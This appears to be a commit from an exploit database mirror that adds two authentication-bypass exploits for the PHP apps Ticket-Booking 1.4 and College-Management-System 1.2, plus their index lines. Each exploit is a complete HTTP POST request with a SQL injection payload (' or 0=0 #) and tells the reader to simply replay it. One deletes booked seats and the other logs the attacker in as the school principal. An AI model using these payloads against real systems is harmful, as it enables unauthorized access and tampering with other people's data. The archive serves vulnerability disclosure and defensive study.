DB: 2019-09-15

2 changes to exploits/shellcodes Ticket-Booking 1.4 - Authentication Bypass College-Management-System 1.2 - Authentication Bypass
2019-09-15 05:02:26 +00:00 · 2019-09-15 05:02:26 +00:00 · a6db0c9d90
commit a6db0c9d90
parent d154146052
3 changed files with 63 additions and 0 deletions
--- a/exploits/php/webapps/47387.txt
+++ b/exploits/php/webapps/47387.txt
@ -0,0 +1,30 @@
+# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
+# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
+# Tested Version: 1.4
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Description:
+# Easy authentication bypass vulnerability on this ticket booking application 
+# allowing the attacker to remove any previously booked seats
+
+# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)
+
+POST /ticket/cancel.php HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/ticket/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+userid='%20or%200%3d0%20#&password=123&save=signin
--- a/exploits/php/webapps/47388.txt
+++ b/exploits/php/webapps/47388.txt
@ -0,0 +1,31 @@
+# Exploit Title: College-Management-System 1.2 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
+# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
+# Tested Version: 1.2
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Easy authentication bypass vulnerability on the application 
+# allowing the attacker to log in as the school principal.
+
+# Simply replay the below Burp request or use Curl.
+# Payload: ' or 0=0 #
+
+POST /college/principalcheck.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/college/principalcheck.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+emailid='%20or%200%3d0%20#&pass=asdf
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41732,3 +41732,5 @@ id,file,description,date,author,type,platform,port
 47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
 47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
 47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
+47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
+47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,